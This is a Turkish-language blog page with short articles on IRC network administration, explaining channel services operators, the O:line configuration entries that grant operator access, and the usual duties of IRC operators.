Kanal Servisleri Operatoru, genellikle CSop olarak bilinmektedir.Sifreleri alip gonderebilir, nickleri ve kanallari dondurabilir, kanallari kapatabilir, vb.
Sifre problemleriyle ilgilendiklerin beri, CSoplar cogunlukla bu konuda danisilan ilk operlerdir.Ancak, birinin CSop olup olmadigini ayirt etmek mumkun degildir ve bunu /whois bilgilerinde de goremezsiniz. CSoplarin listesi /motd services.* komutu yazilarak gorulebilir.
Yorum Yok »
admin tarafýndan IRC Makaleleri, IRCd Dökümanları, IRCd-Services içinde postalandý, tags: "Oper" fonksiyonu nasil calisir?, chat, chat odaları, İRCD makaleleri, ircd services eğitimi, IRCd-Services, mirc download, mircbul, oper, sohbet, sohbet odaları, Türkçe mirc indir
O:line (buyuk harf ‘O’) global operator olan birine verilir. Bir local operator’un accessi o:line (kucuk harf ‘o’) olarak tasfir edilir.
Tekniksel terimleriyle, O:line, IRC serveri (IRCd) konfigurasyon dosyasi icerisindeki kod satiridir. O:line, IRCop’larin host, nickname ve sifre bilgilerini icerir. Ayrica, kisi /oper komutunu yazdiginda, ayarlanmasi gereken kullanici kiplerinin kullanici bayraklari uzerinden, kullanabilecegi komutlarin seviyelerini belirtir.
Bir Server yoneticisi, serverinin IRCop ekibine birini eklemek istedigi zaman, bu kisi icin konfigurasyon dosyasina bir O:line ekler.Bu satir bir kere eklendiginde, ondan sonra /oper komutu o server uzerinde IRCop olmasini saglayacaktir. IRCop, /oper komutunu kullanmak icin her zaman O:line’ini tasiyan serverden baglanmak zorundadir aksi takdirde baska bir server uzerinde /oper komutu islemez.
Bu yuzden, bir IRCop her zaman yalnizca bir server kadrosuna baglidir (genellikle bu onlarin ana serveri olarak adlandirilir). Ancak, onlarin yedekleri olarak bilinen, baska bir server uzerinde de /oper komutunu kullanabilme kabiliyetleri vardir.
Yorum Yok »
admin tarafýndan IRC Makaleleri, IRCd Dökümanları, IRCd-Services içinde postalandý, tags: Bir IRCop'un sorumluluklari nelerdir?, chat, chat odaları, görev dağılımı, İRCD makaleleri, İrcoplar ile ilgili dökumanlar, mircbul indir, sohbet, sohbet odaları, Türkçe mirc indir
Bir IRCop’un sorumluluklari nelerdir?
Bir IRCop’un oncelikli gorevi serverinin ve tum agin butun bir sekilde gitmesine ve duzgun calismasini saglamaktadir. Gorevlerinin icinde klonlari, flood yapanlari, kitlesel reklam yapanlari (spammers) temizlemek ve de belli lag veya netsplitlerini gidermek amaciyla serverlerin baglantisini koparip yeniden baslatmak gibi seyler vardir.
Ayrica, bir IRCop zamanini kullanicilara yardim etmek amaciyla da gecirebilir.Ornegin, bir IRCop aranmasindaki en yaygin nedenlerden biride kullanicilarin sifrelerini unutmalaridir.Liderchat yonetimi tarafindan takdirle karsilanmasina ragmen, bir IRCop aslinda kullanicilara yerdim etmek *ihtiyacinda* degildir.
Belli bir server yoneticisi, operlerinden zamanlarinin belli bir kismini kullancilara yardim ederek gecirmelerini talep edebilir, ancak bu tum serverler icin gecerli degildir.Bir IRCop bu serverlerin birinde olmus olsa bile, istedikleri bir nedenden asistanlik etme olayini kabul etmeme yetkisine de sahiptir.Bircok IRCop’un genelde kendi sohbet etme zamanlarina ve gercek yasamdaki islerine ek olarak, bircok gorevden dolayi cok mesgul olduklarini unutmayiniz.
Yorum Yok »
|
|
